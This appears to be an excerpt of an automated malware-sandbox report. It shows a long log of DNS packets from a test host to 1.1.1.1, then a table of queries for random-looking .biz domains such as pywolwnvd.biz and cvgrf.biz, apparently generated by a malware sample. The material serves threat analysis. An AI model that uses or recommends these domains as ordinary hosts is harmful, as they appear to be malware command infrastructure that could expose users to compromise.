                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:21.080030918 CEST6352853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:21.083045959 CEST53625801.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:21.091000080 CEST53635281.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:22.989650965 CEST5574253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:22.997060061 CEST53557421.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:23.682863951 CEST5946053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:23.690917015 CEST53594601.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:23.768739939 CEST5125853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:23.776432037 CEST53512581.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:24.588457108 CEST6002153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:24.591133118 CEST6226653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:24.614044905 CEST6226653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:24.614067078 CEST6002153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:24.780838013 CEST53600211.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:24.780855894 CEST53600211.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:24.789833069 CEST53622661.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:24.789846897 CEST53622661.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:26.900058985 CEST4999153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:26.909574986 CEST53499911.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:28.686944008 CEST5953753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:28.687927008 CEST6470553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:28.707962990 CEST6470553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:28.707995892 CEST5953753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:28.969969034 CEST53647051.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:28.970031977 CEST53647051.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:28.970918894 CEST53595371.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:28.971287012 CEST53595371.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:29.470048904 CEST5608153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:29.477132082 CEST53560811.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:29.979340076 CEST6237753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:29.986869097 CEST53623771.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.314840078 CEST6213053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.321964979 CEST53621301.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.469049931 CEST6531653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.477036953 CEST53653161.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.799125910 CEST5903153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.806025982 CEST53590311.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:30.973304033 CEST5489253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:31.004970074 CEST5489253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:31.167625904 CEST53548921.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:31.167643070 CEST53548921.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:31.274749041 CEST5586253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:31.282222033 CEST53558621.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:32.042572975 CEST5540353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:32.050183058 CEST53554031.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:32.522382975 CEST5145653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:32.530766010 CEST53514561.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:32.709728003 CEST6025553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:32.716885090 CEST53602551.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.195297003 CEST5449953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.203341007 CEST53544991.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.273801088 CEST5309453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.284136057 CEST53530941.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.693806887 CEST6428353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.701740026 CEST53642831.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.764151096 CEST6151253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:33.771761894 CEST53615121.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:34.889931917 CEST5343453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:34.900620937 CEST53534341.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:36.582032919 CEST4922653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:36.582226038 CEST5294253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:36.594144106 CEST53492261.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:36.594661951 CEST53529421.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:37.352750063 CEST5237853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:37.360260010 CEST6296853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:37.361228943 CEST53523781.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:37.367343903 CEST53629681.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:37.890250921 CEST6119453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:37.897706985 CEST53611941.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:38.926620007 CEST5227853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:38.934562922 CEST53522781.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:38.939327955 CEST5852953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:38.947499990 CEST53585291.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:39.778835058 CEST5410253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:39.786298990 CEST53541021.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:40.271981955 CEST5245453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:40.284915924 CEST53524541.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:40.302716017 CEST6191053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:40.311197042 CEST53619101.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:40.311815977 CEST5897153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:40.319757938 CEST53589711.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:40.320343018 CEST5978753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:40.331504107 CEST53597871.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:41.023031950 CEST6250353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:41.030932903 CEST53625031.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:41.562444925 CEST5835953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:41.572021008 CEST53583591.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:42.343960047 CEST4922053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:42.351650953 CEST53492201.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:42.352154016 CEST5694653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:42.360300064 CEST53569461.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:43.098073959 CEST6266653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:43.106113911 CEST53626661.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:43.609992981 CEST6385653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:43.617567062 CEST53638561.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:44.526135921 CEST4926253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:44.537683010 CEST53492621.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:45.745062113 CEST5834153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:45.752326965 CEST53583411.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:47.183936119 CEST5913253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:47.193948984 CEST53591321.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:47.959109068 CEST6491953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:47.966646910 CEST53649191.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:49.320842028 CEST6170453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:49.328537941 CEST53617041.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:50.091968060 CEST5768853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:50.100379944 CEST53576881.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:51.011672974 CEST4943953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:51.021342993 CEST53494391.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:51.503489971 CEST6054453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:51.520390034 CEST6054453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:51.530282974 CEST53605441.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:51.601727009 CEST53605441.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:52.502993107 CEST6016853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:52.512458086 CEST53601681.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:53.023447037 CEST5833453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:53.032753944 CEST53583341.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:53.800272942 CEST5364953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:53.807996988 CEST53536491.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:54.299663067 CEST5599553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:54.308206081 CEST53559951.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:55.163779020 CEST5677953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:55.171786070 CEST53567791.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:55.710436106 CEST5957453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:55.718128920 CEST53595741.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:56.795047998 CEST6375053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:56.802808046 CEST53637501.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:58.236814022 CEST6415753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:58.255156040 CEST6415753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:58.384229898 CEST53641571.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:58.384305000 CEST53641571.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:59.736218929 CEST5687853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:30:59.744889975 CEST53568781.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:00.404572964 CEST5606853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:00.412753105 CEST53560681.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:01.410911083 CEST6083753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:01.419359922 CEST53608371.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:01.420227051 CEST5376153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:01.429784060 CEST53537611.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:03.778232098 CEST6386953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:03.785809040 CEST53638691.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:03.786683083 CEST5664553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:03.795036077 CEST53566451.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:03.795753002 CEST5903853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:03.806251049 CEST53590381.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:10.412271976 CEST5540253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:10.420854092 CEST53554021.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:23.104495049 CEST6243853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:23.113141060 CEST53624381.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:35.802922964 CEST4950053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:35.811852932 CEST53495001.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:37.145896912 CEST5142253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:37.154448032 CEST53514221.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:39.751966953 CEST6045253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:39.761208057 CEST53604521.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:40.333559036 CEST5891753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:40.341305971 CEST53589171.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:41.695791960 CEST5272353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:41.707365036 CEST53527231.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:42.721791029 CEST5354553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:42.739372969 CEST5354553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:42.911767960 CEST53535451.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:42.912312984 CEST53535451.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:43.674520969 CEST6552853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:43.683409929 CEST53655281.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:44.188338041 CEST5932153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:44.198812962 CEST53593211.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:44.830955982 CEST6238753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:44.838720083 CEST53623871.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:46.186583042 CEST5682153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:46.196471930 CEST53568211.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:46.888664007 CEST5283253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:46.895880938 CEST53528321.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:47.631711960 CEST5825553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:47.642970085 CEST53582551.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:48.389748096 CEST5805153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:48.411658049 CEST5805153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:48.482764006 CEST53580511.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:48.482780933 CEST53580511.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:48.979176044 CEST6453853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:48.987709999 CEST53645381.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:50.046585083 CEST5253753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:50.054546118 CEST53525371.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:51.148015022 CEST6124053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:51.156081915 CEST53612401.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:52.176611900 CEST4966453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:52.185369015 CEST53496641.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:53.258775949 CEST5307253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:53.266381025 CEST53530721.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:54.067528963 CEST5826253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:54.075490952 CEST53582621.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:55.765467882 CEST6257353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:55.773689985 CEST53625731.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:56.300477028 CEST6474653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:56.310333014 CEST53647461.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:56.818048000 CEST5204153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:31:56.826214075 CEST53520411.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:32:05.897269964 CEST6304453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:32:05.926830053 CEST6304453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:32:05.992681026 CEST53630441.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:32:05.992773056 CEST53630441.1.1.1192.168.2.4

                                                                                                                                                                                                                                                                                                                                                                                                                              DNS Queries

                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:27:56.273377895 CEST192.168.2.41.1.1.10x5cb9Standard query (0)pywolwnvd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:27:57.203593969 CEST192.168.2.41.1.1.10x8fcdStandard query (0)ssbzmoy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:27:58.117877960 CEST192.168.2.41.1.1.10x17fbStandard query (0)pywolwnvd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:27:58.683916092 CEST192.168.2.41.1.1.10xf763Standard query (0)cvgrf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:27:59.692158937 CEST192.168.2.41.1.1.10xf763Standard query (0)cvgrf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:00.208221912 CEST192.168.2.41.1.1.10xbdStandard query (0)ssbzmoy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:00.927560091 CEST192.168.2.41.1.1.10x8d92Standard query (0)npukfztj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:01.462033987 CEST192.168.2.41.1.1.10xe065Standard query (0)przvgke.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:01.640499115 CEST192.168.2.41.1.1.10x23f2Standard query (0)cvgrf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:02.555834055 CEST192.168.2.41.1.1.10x6191Standard query (0)zlenh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:02.566420078 CEST192.168.2.41.1.1.10xd7ddStandard query (0)knjghuig.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:03.453448057 CEST192.168.2.41.1.1.10xd617Standard query (0)npukfztj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:04.035509109 CEST192.168.2.41.1.1.10x1cd2Standard query (0)uhxqin.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:04.046783924 CEST192.168.2.41.1.1.10xa98cStandard query (0)anpmnmxo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:04.058389902 CEST192.168.2.41.1.1.10xdd98Standard query (0)lpuegx.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:04.661509037 CEST192.168.2.41.1.1.10x2baaStandard query (0)przvgke.bizA (IP address)IN (0x0001)false
